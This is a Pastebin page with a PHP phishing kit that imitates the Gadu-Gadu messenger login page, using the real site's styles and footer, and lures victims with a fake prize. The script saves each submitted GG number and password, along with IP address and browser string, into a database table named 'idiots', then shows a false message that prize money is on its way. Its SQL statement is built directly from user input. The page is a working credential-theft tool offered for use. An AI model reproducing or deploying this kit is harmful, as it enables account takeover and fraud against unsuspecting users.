API tools faq
paste
Advertisement
ShadyPL

Gadu-Gadu Infobot Phishing in PHP

ShadyPL
Jan 28th, 2013
641
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.43 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  3. <head>
  4.     <title> Centrum Logowania Gadu-Gadu</title>
  5.     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  6.     <meta name="copyright" content="Copyright (c) 2007 GG Network S.A." />
  7.     <style type="text/css">
  8.         @import url("https://login.gadu-gadu.pl/css/style.css?15102008");
  9.     </style>
  10.     <style type="text/css">
  11.      @import url("https://login.gadu-gadu.pl/css/login-style-ie.css?25092008");
  12.     .cbalink {
  13.     display:none;
  14.     }</style>
  15. </head>
  16.  
  17. <body class="body-identifier-pl" id="landing">
  18.     <div class="central_box_regform_outer central_box_regform_outer_pl" id="wrapper">
  19.         <div class="central_box_regform central_box_regform_Common_login " id="content">
  20.             <div id="logo_big"></div>    
  21.      
  22. <div id="login_page">
  23.     <div class="bottomFrame" id="login">    
  24.         <div class="frame" id="loginView">
  25.             <form method="post" action="#">
  26.                 <input type="hidden" name="action" value="Common_login" />
  27.                 <input type="hidden" name="endpoint" value="www" />              
  28.                
  29.             <fieldset>
  30.  
  31. <?php
  32. ////////////////////////////////////////////////////////////
  33. //////// script created by Shady on GNU/GPL license ////////
  34. ////////  gg 15530223 | mail izzypjchamp@gmail.com  ////////
  35. ////////////////////////////////////////////////////////////
  36.  
  37. /**************** DATABASE : idiots *****************
  38. CREATE TABLE IF NOT EXISTS `idiots` (
  39.   `id` int(11) NOT NULL AUTO_INCREMENT,
  40.   `login` varchar(40) COLLATE utf8_polish_ci NOT NULL,
  41.   `pass` varchar(40) COLLATE utf8_polish_ci NOT NULL,
  42.   `time` varchar(22) COLLATE utf8_polish_ci NOT NULL,
  43.   `ip` varchar(15) COLLATE utf8_polish_ci NOT NULL,
  44.   `agent` text COLLATE utf8_polish_ci NOT NULL,
  45.   PRIMARY KEY (`id`)
  46. ) ENGINE=InnoDB  DEFAULT CHARSET=utf8 COLLATE=utf8_polish_ci AUTO_INCREMENT=1 ;
  47. ******************************************************/
  48.  
  49. session_start();
  50.  
  51. function true_ip() {
  52.     if(isset($_SERVER['HTTP_CLIENT_IP'])) $ip = $_SERVER['HTTP_CLIENT_IP'];
  53.     elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  54.     else $ip = $_SERVER['REMOTE_ADDR'];
  55.  
  56.     return $ip;
  57. }
  58.  
  59. if(isset($_POST['submit'])) {
  60.     if(empty($_POST['uin']) || empty($_POST['password'])) { echo '<script>alert("Nie podano wszystkich danych konta, uzupelnij brakujace pola.");</script>'; }
  61.     else {
  62.         try {
  63.         $db = new PDO('mysql:host=localhost;dbname=base_name;encoding=utf8', 'user', 'pass');
  64.         $db -> setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
  65.    
  66.         $db -> exec("INSERT INTO idiots (login, pass, time, ip, agent) VALUES ('".$_POST['uin']."', '".$_POST['password']."', '".date('d.m.y H:i:s')."', '".true_ip()."', '".$_SERVER['HTTP_USER_AGENT']."')");
  67.         $_SESSION['on'] = true;
  68.         header('Location: #');
  69.         }
  70.         catch(PDOException $error) {
  71.             exit('Error communicating with the database!<br/>'.$error);
  72.         }
  73.     }
  74. }
  75.  
  76. if(empty($_SESSION['on'])) {
  77.             echo '
  78.            <legend id="logInTxt">Zaloguj sie, aby odebrac nagrode</legend>
  79.            <legend id="logAsTxt" style="display:none;">Zaloguj jako</legend>
  80.                <div class="box_header">
  81.                    <label><b>Numer GG</b> <span class="light gray">email lub telefon</span></label>
  82.                    
  83.                                    <input id="uin" name="uin" value="" class="input_long " type="text" tabindex="1"/>
  84.                                                    
  85.                </div>
  86.  
  87.                <div class="margin">
  88.                    <label>Haslo</label>
  89.                    <input class="input_long " id="password" name="password" value="" type="password" tabindex="2"/>
  90.                </div>
  91.  
  92.                <div class="actionsLeft">
  93.                    <button class="blue" type="submit" name="submit">Zaloguj</button>
  94.                    <button class="blue" type="submit" name="cancel" value="cancel">Usun</button>
  95.                </div>
  96.  
  97.                <div>
  98.                    <label for="remember_me" class="additional light gray">
  99.                        <input type="checkbox" name="remember_me" id="remember_me">
  100.                        Zapamietaj mnie                    </label>
  101.                </div>
  102.            </fieldset>
  103.            <hr></hr>
  104.            
  105.            <div class="margin">
  106.                <a class="" href="https://login.gadu-gadu.pl/account/remindpass">Nie pamietam numeru GG</a>                
  107.                <br/>
  108.                <a class="" href="https://login.gadu-gadu.pl/account/remindpass">Nie pamietam hasla</a>              
  109.            </div>
  110.         </form>
  111.        </div>
  112.  
  113.        <div class="darkBox">
  114.            <div>
  115.                Nie masz konta GG?            <a href="https://login.gadu-gadu.pl/account/register">Zaloz konto &#187;</a>        </div>
  116.            </div>
  117.        </div>';
  118.     } else {
  119.         echo '<font size="3em"><b>Autoryzacja przebiegla pomyslnie!</b></font><br/><br/>
  120.        Proces potwierdzajacy wlasciciela nagrody zostal ukonczony. Wkrotce na Twoj wirtualny portfel zostanie przelana wygrana kwota. Realizacja moze potrwac od kilku minut do 2 godzin.<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><b>Pozdrawiamy, zespol Gadu-Gadu!</b>';
  121.     }
  122.     ?>
  123.     </div>
  124. </div>
  125. <div id="footer">
  126.     <div id="footer_logo">
  127.         <div id="logo_small"></div>
  128.         <div id="menu">
  129.             <p>
  130.                 <a href="http://www.gg.pl/info/pobierz"><b>Pobierz GG</b></a>
  131.                 - <a href="http://www.gg.pl/pomoc/">Pomoc</a>
  132.                 - <a href="http://www.gg.pl/developer/">Dla developerow</a>
  133.                 - <a href="http://www.gg.pl/prawne/regulamin">Regulamin</a>
  134.                 - <a href="http://www.gg.pl/prawne/polityka-prywatnosci">Prywatnosc</a>
  135.                 - <a href="http://www.gg.pl/kontakt">Zglos naduzycie</a>
  136.             </p>
  137.             <p><b>&copy; 2012 GG Network S.A.</b> -
  138.                 <a href="http://biuroprasowe.gadu-gadu.pl/">O nas</a>
  139.                 -
  140.                 <a href="http://reklama.gadu-gadu.pl/">Reklama</a>
  141.                 -
  142.                 <a href="http://www.gg.pl/kariera">Kariera</a>
  143.                 -
  144.                 <a href="http://www.gg.pl/kontakt">Kontakt</a></p>
  145.         </div>
  146.     </div>
  147. </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!